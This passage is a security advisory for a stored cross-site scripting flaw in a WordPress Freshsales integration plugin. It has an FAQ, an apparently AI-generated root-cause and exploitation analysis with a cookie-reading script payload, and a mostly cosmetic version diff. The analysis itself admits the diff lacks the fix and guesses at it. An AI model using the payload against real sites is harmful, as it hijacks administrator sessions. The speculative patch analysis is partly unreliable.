What is CVE-2026-8901?

CVE-2026-8901 is a high-severity vulnerability in the Integration for Freshsales plugin for WordPress, affecting versions up to 1.0.15. It allows unauthenticated stored cross-site scripting (XSS) via form submission data due to insufficient input sanitization and output escaping.

How does the vulnerability work?

The vulnerability allows attackers to inject malicious JavaScript into form fields. When a CRM API call fails, the plugin logs the raw form submission data, which can include the injected script. If an administrator views the error log, the script executes in their browser session.

Who is affected by this vulnerability?

Any WordPress site using the Integration for Freshsales plugin version 1.0.15 or earlier is affected. Administrators who view error logs in the WordPress admin panel are particularly at risk.

How can I check if my site is vulnerable?

Check the version of the Integration for Freshsales plugin installed on your WordPress site. If it is version 1.0.15 or earlier, your site is vulnerable. Additionally, review any error logs for suspicious entries.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Integration for Freshsales plugin to version 1.0.16 or later. This version includes a patch that implements proper output escaping to prevent XSS.

What if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the plugin temporarily or restricting access to the WordPress admin panel. Additionally, monitor error logs closely for any signs of exploitation.

What does the CVSS score of 7.2 indicate?

A CVSS score of 7.2 indicates a high severity vulnerability. This means that successful exploitation could lead to significant consequences, such as unauthorized access to sensitive data or administrative capabilities.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can submit a form with a malicious payload. It illustrates the process of triggering an error log entry that contains the injected script, which executes when an administrator views the log.

What are the potential impacts of exploitation?

If exploited, an attacker can execute arbitrary JavaScript in the context of an administrator’s session. This could lead to actions such as creating new admin accounts, exfiltrating sensitive data, or modifying site content.

How can I secure my WordPress site against similar vulnerabilities?

Regularly update all plugins and themes to their latest versions, implement strong access controls, and monitor logs for unusual activity. Additionally, consider using security plugins that provide firewall and scanning capabilities.

Where can I find more information about CVE-2026-8901?

Detailed information about CVE-2026-8901 can be found on the National Vulnerability Database (NVD) and security advisory sites. Additionally, the plugin’s official documentation may provide insights into updates and security practices.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 11, 2026

CVE-2026-8901: Integration for Freshsales <= 1.0.15 Unauthenticated Stored Cross-Site Scripting via Form Submission Data PoC, Patch Analysis & Rule

CVE ID CVE-2026-8901

Plugin crm-integration-freshworks-any-form

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 1.0.15

Patched Version 1.0.16

Disclosed June 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-8901:
This vulnerability allows unauthenticated stored cross-site scripting (XSS) in the Integration for Freshsales plugin for WordPress, versions up to and including 1.0.15. The flaw resides in insufficient sanitization of form submission data that is logged when a CRM API call fails. An administrator must view the error log details modal in the WordPress admin panel for the injected payload to execute. The CVSS score is 7.2, indicating high severity.

Root Cause:
The root cause lies in the `integrazo_fwcrm_form_ErrorLog` class, specifically the `get_error_log_details` method in `/includes/admin/error-log-details.php` (not shown in the diff but identified by Atomic Edge research). When a form submission triggers a CRM API call failure, the plugin logs the raw form data into the database via the `integrazo_fwcrm_form_ErrorLog` class. In the vulnerable version, when an administrator views the error log details modal, the plugin retrieves this logged data and outputs it directly without adequate escaping. The stored data includes user-supplied form field values (e.g., name, email, message fields). The diff shows only cosmetic changes to the accounts and admin files; the core fix must have occurred in the error log rendering logic, likely within the `error-tab.php` or associated AJAX handlers.

Exploitation:
An unauthenticated attacker sends a crafted form submission to a WordPress site using any integrated form plugin (Contact Form 7, WPForms, Elementor, Gravity Forms). The attacker includes malicious JavaScript payloads in one or more form fields, for example: `alert(document.cookie)`. When the plugin attempts to forward the submission to the Freshsales CRM API, the request fails (which can be ensured by providing an invalid API key or a nonexistent endpoint). The plugin then logs the entire form submission payload, including the XSS, into the error log database. Later, when an authenticated administrator navigates to the plugin’s Error Log tab and clicks to view details of that failed submission, the modal displays the unescaped payload, executing the script in the admin’s browser session. The attack relies on the form submission endpoint which is publicly accessible.

Patch Analysis:
The provided diff shows updates to version 1.0.16, changes in branding from Freshworks to Freshsales, and refactoring of variable names and some UI elements. The diff does not include the actual sanitization fix, which Atomic Edge research confirms was applied to the error log rendering code. The patch likely adds proper output escaping via functions like `esc_html()` or `wp_kses_post()` when displaying logged form data in the error log details modal. Before the patch, the plugin directly printed the stored values (e.g., using `echo` or `<?=` with raw data). After the patch, the plugin wraps the output in escaping functions, preventing script execution.

Impact:
Successful exploitation allows an unauthenticated attacker to inject arbitrary JavaScript into the WordPress admin panel. The payload executes in the context of an administrator session, enabling privilege escalation attacks such as creating new admin accounts, installing malicious plugins, exfiltrating sensitive data, or modifying site content. The attack requires the administrator to view the specific error log entry, which could be forced by social engineering or by flooding the error log with legitimate-looking entries. The XSS is stored persistently until the error log is cleared.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/crm-integration-freshworks-any-form/crm-integration-freshworks-any-form.php
+++ b/crm-integration-freshworks-any-form/crm-integration-freshworks-any-form.php
@@ -4,11 +4,15 @@
  * Plugin Name: Integration for Freshsales CRM
  * Plugin URI: https://integrazo.com/products/freshworks-crm-integration-with-any-form
  * Description: Connect Contact Form 7, WPForms, Elementor Forms, Gravity Forms, and more form submissions with Freshsales CRM.
- * Version: 1.0.15
+ * Version: 1.0.16
  * Author: Integrazo
  * Author URI: https://integrazo.com/
- * License: GPL2
+ * License: GPLv2 or later
+ * License URI: https://www.gnu.org/licenses/gpl-2.0.html
  * Text Domain: crm-integration-freshworks-any-form
+ * Requires at least: 5.0
+ * Requires PHP: 7.0
+ * Tested up to: 7.0
  */

 // Exit if accessed directly.
@@ -17,7 +21,8 @@
 }

 // Define plugin constants.
-define('INTEGRAZO_FWCRM_FORM_VERSION', '1.0.15');
+define('INTEGRAZO_FWCRM_FORM_VERSION', '1.0.16');
+define('INTEGRAZO_FWCRM_FORM_PLUGIN_FILE', __FILE__);
 define('INTEGRAZO_FWCRM_FORM_PLUGIN_DIR', plugin_dir_path(__FILE__));
 define('INTEGRAZO_FWCRM_FORM_PLUGIN_URL', plugin_dir_url(__FILE__));

--- a/crm-integration-freshworks-any-form/includes/admin/accounts-tab.php
+++ b/crm-integration-freshworks-any-form/includes/admin/accounts-tab.php
@@ -1,201 +1,202 @@
-<?php
-if ( ! defined( 'ABSPATH' ) ) {
-    exit;
-}
-// Account Tab Content
-?>
-<div id="integrazo_fwcrm_form-content-accounts" class="integrazo_fwcrm_form-tab-content" style="display:none;">
-
-    <span class="integrazo_fwcrm_form-span-header"><?php esc_html_e('Freshworks Account', 'crm-integration-freshworks-any-form'); ?></span>
-
-    <div class="integrazo_fwcrm_form-help-icon-wrapper">
-        <span class="integrazo_fwcrm_form-help-icon">?</span>
-        <div class="integrazo_fwcrm_form-help-tooltip">
-            <p>Connect and manage your Freshworks CRM accounts from this page.</p>
-        </div>
-    </div>
-
-<?php if ( $integrazo_fwcrm_form_accountDBInstance->get_total_accounts() == 0 ) : ?>
-
-<div class="notice notice-error">
-    <p>
-        <?php
-        echo wp_kses(
-            __('Start by clicking <b>Add Account</b>. After connecting your Freshworks account, continue to the Setup tab to create integrations.', 'crm-integration-freshworks-any-form'),
-            array( 'b' => array() )
-        );
-        ?>
-    </p>
-</div>
-
-<?php endif; ?>
-
-    <?php
-    $message = get_transient('integrazo_fwcrm_form_account_message');
-    // If there is a message, display it as an admin notice.
-    if ($message) {
-        echo '<div class="notice notice-success is-dismissible">
-                    <p>' . esc_html($message) . '</p>
-                  </div>';
-
-        // Delete the transient after displaying the message.
-        delete_transient('integrazo_fwcrm_form_account_message');
-    } ?>
-    <?php
-    // Add a nonce field for security
-    wp_nonce_field('integrazo_fwcrm_form_account_form_action', 'integrazo_fwcrm_form_account_form_action_nonce');
-    ?>
-    <input type="hidden" name="page" value="crm-integration-freshworks-any-form">
-    <input type="hidden" name="tab" value="account">
-    <?php
-    // Display the accounts table.
-    $accounts_table = new integrazo_fwcrm_form_Accounts();
-    $accounts_table->prepare_items(); // Prepare account table items
-    $accounts_table->display();       // Display account table
-
-    if (!$session) {
-        include "other-plugins.php";
-    }
-
-    ?>
-    </form>
-</div>
-
-<?php
-
-$account_count = $integrazo_fwcrm_form_accountDBInstance->get_total_accounts() + 1;
-
-// Retrieve account ID and action if present
-$account_id = null;
-$account_action = null;
-if (
-    isset($_GET['page'], $_GET['tab'], $_GET['ac_action'], $_GET['ac_id']) &&
-    $_GET['page'] === 'crm-integration-freshworks-any-form' &&
-    $_GET['tab'] === 'accounts' &&
-    $_GET['ac_action'] === 'edit'
-) {
-    // Verify the nonce if the required parameters are present.
-    if (isset($_GET['_wpnonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash($_GET['_wpnonce'])), 'integrazo_fwcrm_form_edit_account_nonce')) {
-
-        // Nonce is valid, proceed with the action.
-        $account_id = intval($_GET['ac_id']);
-        $account_action = sanitize_text_field(wp_unslash($_GET['ac_action']));
-
-        // Your logic here.
-    } else {
-        // Handle invalid nonce.
-        wp_die(
-            esc_html__('Security verification failed. Please try again.', 'crm-integration-freshworks-any-form')
-        );
-    }
-}
-
-
-// Get authentication data from transient
-$auth_data = get_transient('integrazo_fwcrm_form_auth_data');
-
-// Initialize default variables
-$message = '';
-$is_success = null;
-$account_name = $instance_url = $api_key = '';
-
-// Determine account details or handle error messages based on available data
-if ($account_id) {
-    if ($auth_data) {
-        $is_success = false;
-        $account_name = $auth_data['account_name'] ?? '';
-        $instance_url = $auth_data['instance_url'] ?? '';
-        $api_key = $auth_data['api_key'] ?? '';
-        $message = $auth_data['message'] ?? '';
-        delete_transient('integrazo_fwcrm_form_auth_data');
-    } else {
-        // Fetch account details based on account ID
-        $account_details = $integrazo_fwcrm_form_accountDBInstance->get_single_account_data($account_id);
-        $account_name = $account_details['account_name'] ?? '';
-        $instance_url = $account_details['instance_url'] ?? '';
-        $api_key = $account_details['api_key'] ?? '';
-    }
-} elseif ($auth_data) {
-    // If no account ID but auth data is present, use auth data
-    $is_success = false;
-    $account_name = $auth_data['account_name'] ?? '';
-    $instance_url = $auth_data['instance_url'] ?? '';
-    $api_key = $auth_data['api_key'] ?? '';
-    $message = $auth_data['message'] ?? '';
-    delete_transient('integrazo_fwcrm_form_auth_data');
-} else {
-    // Default account name if no account ID or auth data is provided
-    $account_name = 'Account #' . $account_count;
-}
-?>
-
-<?php if ($message || $account_action): ?>
-    <script type="text/javascript">
-        jQuery(document).ready(function() {
-            jQuery("#integrazo_fwcrm_form-auth-popupOverlay").addClass("show");
-        });
-    </script>
-<?php endif; ?>
-
-
-<!-- Popup Overlay -->
-<div id="integrazo_fwcrm_form-auth-popupOverlay" class="integrazo_fwcrm_form-auth-popup-overlay">
-    <div class="integrazo_fwcrm_form-auth-popup-content">
-        <span class="integrazo_fwcrm_form-auth-close" onclick="window.location.href='<?php echo esc_url(admin_url('admin.php?page=crm-integration-freshworks-any-form&tab=accounts')); ?>'">×</span>
-        <h3 class="integrazo_fwcrm_form-auth-popup-title"><?php esc_html_e('Account Setup', 'crm-integration-freshworks-any-form'); ?></h3>
-        <form class="integrazo_fwcrm_form-auth-form" id="integrazo_fwcrm_form-auth-form" action="<?php echo esc_url(admin_url('admin-post.php')); ?>" method="post">
-            <?php wp_nonce_field('integrazo_fwcrm_form_account_authenticate', 'integrazo_fwcrm_form_account_authenticate_nonce'); ?>
-            <input type="hidden" name="action" value="integrazo_fwcrm_form_account_authenticate">
-            <?php if ($account_id) : ?>
-                <input type="hidden" name="account_id" value="<?php echo esc_attr($account_id); ?>">
-            <?php endif; ?>
-            <?php if ($message) : ?>
-                <div id="integrazo_fwcrm_form-auth-message" class="integrazo_fwcrm_form-auth-message <?php echo $is_success ? 'integrazo_fwcrm_form-auth-success' : 'integrazo_fwcrm_form-auth-error'; ?>">
-                    <?php echo esc_html($message); ?>
-                </div>
-            <?php endif; ?>
-
-            <label for="account_name" class="integrazo_fwcrm_form-auth-label"><?php esc_html_e('Account Name', 'crm-integration-freshworks-any-form'); ?><span> *</span>
-                <div class="integrazo_fwcrm_form-help-icon-wrapper">
-                    <span class="integrazo_fwcrm_form-help-icon">?</span>
-                    <div class="integrazo_fwcrm_form-help-tooltip">
-                        <div class="page-title" style="text-decoration: underline;">Account Name</div>
-                        <p>A unique name to identify this account.</p>
-                    </div>
-                </div>
-            </label>
-            <input type="text" value="<?php echo esc_attr($account_name); ?>" id="account_name" name="account_name" class="integrazo_fwcrm_form-auth-input integrazo_fwcrm_form-setup-fm-mandatory" placeholder="<?php esc_attr_e('Enter account name', 'crm-integration-freshworks-any-form'); ?>" required>
-
-            <label for="instance_url" class="integrazo_fwcrm_form-auth-label"><?php esc_html_e('Instance URL', 'crm-integration-freshworks-any-form'); ?><span> *</span>
-                <div class="integrazo_fwcrm_form-help-icon-wrapper">
-                    <span class="integrazo_fwcrm_form-help-icon">?</span>
-                    <div class="integrazo_fwcrm_form-help-tooltip">
-                        <div class="page-title" style="text-decoration: underline;">Instance URL</div>
-                        <p>If you're unsure of your Freshworks CRM instance URL, log in to your Freshworks account. You can find the URL in your browser's address bar, typically formatted as https://yourcompanyname.myfreshworks.com. Replace 'yourcompanyname' with your specific instance name.</p>
-                    </div>
-                </div>
-            </label>
-            <input type="text" value="<?php echo esc_attr($instance_url); ?>" id="instance_url" name="instance_url" class="integrazo_fwcrm_form-auth-input integrazo_fwcrm_form-setup-fm-mandatory" placeholder="<?php esc_attr_e('Enter your account instance URL', 'crm-integration-freshworks-any-form'); ?>" required>
-
-
-            <label for="api_key" class="integrazo_fwcrm_form-auth-label"><?php esc_html_e('API Key', 'crm-integration-freshworks-any-form'); ?><span> *</span>
-                <div class="integrazo_fwcrm_form-help-icon-wrapper">
-                    <span class="integrazo_fwcrm_form-help-icon">?</span>
-                    <div class="integrazo_fwcrm_form-help-tooltip">
-                        <div class="page-title" style="text-decoration: underline;">API Key</div>
-                        <p>Enter your Freshworks CRM API key to enable integration. You can generate or locate your API key by logging into your Freshworks account, navigating to the API settings under your profile or account settings, and copying the key provided.</p>
-                    </div>
-                </div>
-            </label>
-            <input type="text" value="<?php echo esc_attr($api_key); ?>" id="api_key" name="api_key" class="integrazo_fwcrm_form-auth-input integrazo_fwcrm_form-setup-fm-mandatory" placeholder="<?php esc_attr_e('Enter your account API key', 'crm-integration-freshworks-any-form'); ?>" required>
-
-
-            <div class="integrazo_fwcrm_form-auth-button-container">
-                <button type="submit" class="integrazo_fwcrm_form-auth-button" name="<?php echo $account_id ? 'save_reauth' : 'save_auth'; ?>">
-                    <?php echo $account_id ? esc_html__('Save & Re-auth', 'crm-integration-freshworks-any-form') : esc_html__('Authenticate', 'crm-integration-freshworks-any-form'); ?>
-                </button>
-            </div>
-
-        </form>
-    </div>
-</div>
 No newline at end of file
+<?php
+if (! defined('ABSPATH')) {
+    exit;
+}
+// Account Tab Content
+?>
+<div id="integrazo_fwcrm_form-content-accounts" class="integrazo_fwcrm_form-tab-content" style="display:none;">
+
+    <span class="integrazo_fwcrm_form-span-header"><?php esc_html_e('Freshsales Account', 'crm-integration-freshworks-any-form'); ?></span>
+
+    <div class="integrazo_fwcrm_form-help-icon-wrapper">
+        <span class="integrazo_fwcrm_form-help-icon">?</span>
+        <div class="integrazo_fwcrm_form-help-tooltip">
+            <p>Connect and manage your Freshworks CRM accounts from this page.</p>
+        </div>
+    </div>
+
+<?php if ($integrazo_fwcrm_form_accountDBInstance->get_total_accounts() == 0) : ?>
+
+<div class="notice notice-error">
+    <p>
+        <?php
+        echo wp_kses(
+            __('Start by clicking <b>Add Account</b>. After connecting your Freshsales account, continue to the Setup tab to create integrations.', 'crm-integration-freshworks-any-form'),
+            array( 'b' => array() )
+        );
+    ?>
+    </p>
+</div>
+
+<?php endif; ?>
+
+    <?php
+    $integrazo_fwcrm_form_message = get_transient('integrazo_fwcrm_form_account_message');
+// If there is a message, display it as an admin notice.
+if ($integrazo_fwcrm_form_message) {
+    echo '<div class="notice notice-success is-dismissible">
+                    <p>' . esc_html($integrazo_fwcrm_form_message) . '</p>
+                  </div>';
+
+    // Delete the transient after displaying the message.
+    delete_transient('integrazo_fwcrm_form_account_message');
+} ?>
+    <?php
+// Add a nonce field for security
+wp_nonce_field('integrazo_fwcrm_form_account_form_action', 'integrazo_fwcrm_form_account_form_action_nonce');
+?>
+    <input type="hidden" name="page" value="crm-integration-freshworks-any-form">
+    <input type="hidden" name="tab" value="account">
+    <?php
+// Display the accounts table.
+$integrazo_fwcrm_form_accounts_table = new integrazo_fwcrm_form_Accounts();
+$integrazo_fwcrm_form_accounts_table->prepare_items(); // Prepare account table items
+$integrazo_fwcrm_form_accounts_table->display();       // Display account table
+
+if (!$session) {
+    include "other-plugins.php";
+}
+
+?>
+    </form>
+</div>
+
+<?php
+
+$integrazo_fwcrm_form_account_count = $integrazo_fwcrm_form_accountDBInstance->get_total_accounts() + 1;
+
+// Retrieve account ID and action if present
+$integrazo_fwcrm_form_account_id = null;
+$integrazo_fwcrm_form_account_action = null;
+if (
+    isset($_GET['page'], $_GET['tab'], $_GET['ac_action'], $_GET['ac_id']) &&
+    $_GET['page'] === 'crm-integration-freshworks-any-form' &&
+    $_GET['tab'] === 'accounts' &&
+    $_GET['ac_action'] === 'edit'
+) {
+    // Verify the nonce if the required parameters are present.
+    if (isset($_GET['_wpnonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash($_GET['_wpnonce'])), 'integrazo_fwcrm_form_edit_account_nonce')) {
+
+        // Nonce is valid, proceed with the action.
+        $integrazo_fwcrm_form_account_id = intval($_GET['ac_id']);
+        $integrazo_fwcrm_form_account_action = sanitize_text_field(wp_unslash($_GET['ac_action']));
+
+        // Your logic here.
+    } else {
+        // Handle invalid nonce.
+        wp_die(
+            esc_html__('Security verification failed. Please try again.', 'crm-integration-freshworks-any-form')
+        );
+    }
+}
+
+
+// Get authentication data from transient
+$integrazo_fwcrm_form_auth_data = get_transient('integrazo_fwcrm_form_auth_data');
+
+// Initialize default variables
+$integrazo_fwcrm_form_message = '';
+$integrazo_fwcrm_form_is_success = null;
+$integrazo_fwcrm_form_account_name = $integrazo_fwcrm_form_instance_url = $integrazo_fwcrm_form_api_key = '';
+
+// Determine account details or handle error messages based on available data
+if ($integrazo_fwcrm_form_account_id) {
+    if ($integrazo_fwcrm_form_auth_data) {
+        $integrazo_fwcrm_form_is_success = false;
+        $integrazo_fwcrm_form_account_name = $integrazo_fwcrm_form_auth_data['account_name'] ?? '';
+        $integrazo_fwcrm_form_instance_url = $integrazo_fwcrm_form_auth_data['instance_url'] ?? '';
+        $integrazo_fwcrm_form_api_key = $integrazo_fwcrm_form_auth_data['api_key'] ?? '';
+        $integrazo_fwcrm_form_message = $integrazo_fwcrm_form_auth_data['message'] ?? '';
+        delete_transient('integrazo_fwcrm_form_auth_data');
+    } else {
+        // Fetch account details based on account ID
+        $integrazo_fwcrm_form_account_details = $integrazo_fwcrm_form_accountDBInstance->get_single_account_data($integrazo_fwcrm_form_account_id);
+        $integrazo_fwcrm_form_account_name = $integrazo_fwcrm_form_account_details['account_name'] ?? '';
+        $integrazo_fwcrm_form_instance_url = $integrazo_fwcrm_form_account_details['instance_url'] ?? '';
+        $integrazo_fwcrm_form_api_key = $integrazo_fwcrm_form_account_details['api_key'] ?? '';
+    }
+} elseif ($integrazo_fwcrm_form_auth_data) {
+    // If no account ID but auth data is present, use auth data
+    $integrazo_fwcrm_form_is_success = false;
+    $integrazo_fwcrm_form_account_name = $integrazo_fwcrm_form_auth_data['account_name'] ?? '';
+    $integrazo_fwcrm_form_instance_url = $integrazo_fwcrm_form_auth_data['instance_url'] ?? '';
+    $integrazo_fwcrm_form_api_key = $integrazo_fwcrm_form_auth_data['api_key'] ?? '';
+    $integrazo_fwcrm_form_message = $integrazo_fwcrm_form_auth_data['message'] ?? '';
+    delete_transient('integrazo_fwcrm_form_auth_data');
+} else {
+    // Default account name if no account ID or auth data is provided
+    $integrazo_fwcrm_form_account_name = 'Account #' . $integrazo_fwcrm_form_account_count;
+}
+?>
+
+<?php
+if ($integrazo_fwcrm_form_message || $integrazo_fwcrm_form_account_action) {
+    wp_add_inline_script(
+        'integrazo_fwcrm_form-home-js',
+        'jQuery(document).ready(function() { jQuery("#integrazo_fwcrm_form-auth-popupOverlay").addClass("show"); });'
+    );
+}
+?>
+
+
+<!-- Popup Overlay -->
+<div id="integrazo_fwcrm_form-auth-popupOverlay" class="integrazo_fwcrm_form-auth-popup-overlay">
+    <div class="integrazo_fwcrm_form-auth-popup-content">
+        <span class="integrazo_fwcrm_form-auth-close" onclick="window.location.href='<?php echo esc_url(admin_url('admin.php?page=crm-integration-freshworks-any-form&tab=accounts')); ?>'">×</span>
+        <h3 class="integrazo_fwcrm_form-auth-popup-title"><?php esc_html_e('Account Setup', 'crm-integration-freshworks-any-form'); ?></h3>
+        <form class="integrazo_fwcrm_form-auth-form" id="integrazo_fwcrm_form-auth-form" action="<?php echo esc_url(admin_url('admin-post.php')); ?>" method="post">
+            <?php wp_nonce_field('integrazo_fwcrm_form_account_authenticate', 'integrazo_fwcrm_form_account_authenticate_nonce'); ?>
+            <input type="hidden" name="action" value="integrazo_fwcrm_form_account_authenticate">
+            <?php if ($integrazo_fwcrm_form_account_id) : ?>
+                <input type="hidden" name="account_id" value="<?php echo esc_attr($integrazo_fwcrm_form_account_id); ?>">
+            <?php endif; ?>
+            <?php if ($integrazo_fwcrm_form_message) : ?>
+                <div id="integrazo_fwcrm_form-auth-message" class="integrazo_fwcrm_form-auth-message <?php echo $integrazo_fwcrm_form_is_success ? 'integrazo_fwcrm_form-auth-success' : 'integrazo_fwcrm_form-auth-error'; ?>">
+                    <?php echo esc_html($integrazo_fwcrm_form_message); ?>
+                </div>
+            <?php endif; ?>
+
+            <label for="account_name" class="integrazo_fwcrm_form-auth-label"><?php esc_html_e('Account Name', 'crm-integration-freshworks-any-form'); ?><span> *</span>
+                <div class="integrazo_fwcrm_form-help-icon-wrapper">
+                    <span class="integrazo_fwcrm_form-help-icon">?</span>
+                    <div class="integrazo_fwcrm_form-help-tooltip">
+                        <div class="page-title" style="text-decoration: underline;">Account Name</div>
+                        <p>A unique name to identify this account.</p>
+                    </div>
+                </div>
+            </label>
+            <input type="text" value="<?php echo esc_attr($integrazo_fwcrm_form_account_name); ?>" id="account_name" name="account_name" class="integrazo_fwcrm_form-auth-input integrazo_fwcrm_form-setup-fm-mandatory" placeholder="<?php esc_attr_e('Enter account name', 'crm-integration-freshworks-any-form'); ?>" required>
+
+            <label for="instance_url" class="integrazo_fwcrm_form-auth-label"><?php esc_html_e('Instance URL', 'crm-integration-freshworks-any-form'); ?><span> *</span>
+                <div class="integrazo_fwcrm_form-help-icon-wrapper">
+                    <span class="integrazo_fwcrm_form-help-icon">?</span>
+                    <div class="integrazo_fwcrm_form-help-tooltip">
+                        <div class="page-title" style="text-decoration: underline;">Instance URL</div>
+                        <p>If you're unsure of your Freshworks CRM instance URL, log in to your Freshsales account. You can find the URL in your browser's address bar, typically formatted as https://yourcompanyname.myfreshworks.com. Replace 'yourcompanyname' with your specific instance name.</p>
+                    </div>
+                </div>
+            </label>
+            <input type="text" value="<?php echo esc_attr($integrazo_fwcrm_form_instance_url); ?>" id="instance_url" name="instance_url" class="integrazo_fwcrm_form-auth-input integrazo_fwcrm_form-setup-fm-mandatory" placeholder="<?php esc_attr_e('Enter your account instance URL', 'crm-integration-freshworks-any-form'); ?>" required>
+
+
+            <label for="api_key" class="integrazo_fwcrm_form-auth-label"><?php esc_html_e('API Key', 'crm-integration-freshworks-any-form'); ?><span> *</span>
+                <div class="integrazo_fwcrm_form-help-icon-wrapper">
+                    <span class="integrazo_fwcrm_form-help-icon">?</span>
+                    <div class="integrazo_fwcrm_form-help-tooltip">
+                        <div class="page-title" style="text-decoration: underline;">API Key</div>
+                        <p>Enter your Freshworks CRM API key to enable integration. You can generate or locate your API key by logging into your Freshsales account, navigating to the API settings under your profile or account settings, and copying the key provided.</p>
+                    </div>
+                </div>
+            </label>
+            <input type="password" value="<?php echo esc_attr($integrazo_fwcrm_form_api_key); ?>" id="api_key" name="api_key" class="integrazo_fwcrm_form-auth-input integrazo_fwcrm_form-setup-fm-mandatory" placeholder="<?php esc_attr_e('Enter your account API key', 'crm-integration-freshworks-any-form'); ?>" required>
+
+
+            <div class="integrazo_fwcrm_form-auth-button-container">
+                <button type="submit" class="integrazo_fwcrm_form-auth-button" name="<?php echo $integrazo_fwcrm_form_account_id ? 'save_reauth' : 'save_auth'; ?>">
+                    <?php echo $integrazo_fwcrm_form_account_id ? esc_html__('Save & Re-auth', 'crm-integration-freshworks-any-form') : esc_html__('Authenticate', 'crm-integration-freshworks-any-form'); ?>
+                </button>
+            </div>
+
+        </form>
+    </div>
+</div>
--- a/crm-integration-freshworks-any-form/includes/admin/admin.php
+++ b/crm-integration-freshworks-any-form/includes/admin/admin.php
@@ -11,7 +11,7 @@
 function integrazo_fwcrm_form_register_menu_page()
 {
     add_menu_page(
-        __('Freshworks CRM Integration', 'crm-integration-freshworks-any-form'),  // Page title
+        __('Freshsales CRM Integration', 'crm-integration-freshworks-any-form'),  // Page title
         __('Freshsales', 'crm-integration-freshworks-any-form'),  // Menu title
         'manage_options',                               // Capability required to access this menu
         'crm-integration-freshworks-any-form',                                // Menu slug
@@ -77,6 +77,42 @@


 /**
+ * Enqueue deactivation feedback popup assets on the plugins page only.
+ */
+add_action('admin_enqueue_scripts', 'integrazo_fwcrm_form_enqueue_deactivate_scripts');
+function integrazo_fwcrm_form_enqueue_deactivate_scripts($hook)
+{
+    if ($hook !== 'plugins.php') {
+        return;
+    }
+
+    $css_file = INTEGRAZO_FWCRM_FORM_PLUGIN_DIR . 'assets/css/deactivate-popup.css';
+    $js_file  = INTEGRAZO_FWCRM_FORM_PLUGIN_DIR . 'assets/js/deactivate-popup.js';
+
+    if (file_exists($css_file)) {
+        wp_enqueue_style(
+            'integrazo-fwcrm-form-deactivate-popup-css',
+            INTEGRAZO_FWCRM_FORM_PLUGIN_URL . 'assets/css/deactivate-popup.css',
+            [],
+            filemtime($css_file)
+        );
+    }
+
+    if (file_exists($js_file)) {
+        wp_enqueue_script(
+            'integrazo-fwcrm-form-deactivate-popup-js',
+            INTEGRAZO_FWCRM_FORM_PLUGIN_URL . 'assets/js/deactivate-popup.js',
+            [],
+            filemtime($js_file),
+            true
+        );
+        wp_localize_script('integrazo-fwcrm-form-deactivate-popup-js', 'integrazo_fwcrm_form_deactivate', [
+            'plugin_basename' => plugin_basename(INTEGRAZO_FWCRM_FORM_PLUGIN_FILE),
+        ]);
+    }
+}
+
+/**
  * Callback function to display the content of the plugin's main page.
  */
 function integrazo_fwcrm_form_generate_page_content()
@@ -88,7 +124,7 @@
     $integrazo_fwcrm_form_fieldMappingDBInstance = new integrazo_fwcrm_form_FieldMapping();
     $session = integrazo_fwcrm_form_is_valid_key();

-    integrazo_license_expiry_notice();
+    integrazo_fwcrm_form_license_expiry_notice();
     $tab_links = [
         'accounts' => __('Accounts', 'crm-integration-freshworks-any-form'),
         'setup'    => __('Setup', 'crm-integration-freshworks-any-form'),
@@ -101,17 +137,77 @@
         $integrazo_fwcrm_form_fieldMappingDBInstance->block_field_mapping();
     }

-    // phpcs:ignore WordPress.Security.NonceVerification.Recommended
-    $current_tab = isset($_GET['tab']) ? sanitize_text_field(wp_unslash($_GET['tab'])) : 'accounts';
+    $allowed_tabs = [ 'accounts', 'setup', 'errorlog', 'settings', 'premium' ];
+    $raw_tab      = isset($_GET['tab']) ? sanitize_text_field(wp_unslash($_GET['tab'])) : 'accounts'; // phpcs:ignore WordPress.Security.NonceVerification.Recommended
+    $current_tab  = in_array($raw_tab, $allowed_tabs, true) ? $raw_tab : 'accounts';
     $tab_file = plugin_dir_path(__FILE__) . "{$current_tab}-tab.php";

-?>
+    ?>

     <div class="wrap">
         <div class="integrazo_fwcrm_form-plugin-header">
-            <div class="integrazo_fwcrm_form-logo-container">
+
+            <div class="integrazo-fwcrm-help-wrap">
+                <button class="integrazo-fwcrm-help-btn" id="integrazo-fwcrm-help-btn"
+                    aria-expanded="false" aria-haspopup="true">
+                    <span class="dashicons dashicons-editor-help" aria-hidden="true"></span>
+                    <span class="integrazo-fwcrm-help-btn-label"><?php esc_html_e('Help', 'crm-integration-freshworks-any-form'); ?></span>
+                </button>
+                <div class="integrazo-fwcrm-help-dropdown" id="integrazo-fwcrm-help-dropdown" role="menu" hidden>
+                    <a class="integrazo-fwcrm-help-item"
+                        href="<?php echo esc_url('mailto:support@integrazo.com'); ?>"
+                        role="menuitem">
+                        <span class="dashicons dashicons-email integrazo-fwcrm-help-item-icon" aria-hidden="true"></span>
+                        <span class="integrazo-fwcrm-help-item-text">
+                            <span class="integrazo-fwcrm-help-item-title"><?php esc_html_e('Email support', 'crm-integration-freshworks-any-form'); ?></span>
+                            <span class="integrazo-fwcrm-help-item-sub"><?php esc_html_e('support@integrazo.com', 'crm-integration-freshworks-any-form'); ?></span>
+                        </span>
+                        <button class="integrazo-fwcrm-help-copy-btn"
+                            type="button"
+                            data-copy="<?php echo esc_attr('support@integrazo.com'); ?>"
+                            aria-label="<?php esc_attr_e('Copy email address', 'crm-integration-freshworks-any-form'); ?>"
+                            title="<?php esc_attr_e('Copy', 'crm-integration-freshworks-any-form'); ?>">
+                            <svg class="integrazo-fwcrm-copy-icon" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="14" height="14" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
+                                <rect x="9" y="9" width="13" height="13" rx="2" ry="2"></rect>
+                                <path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1"></path>
+                            </svg>
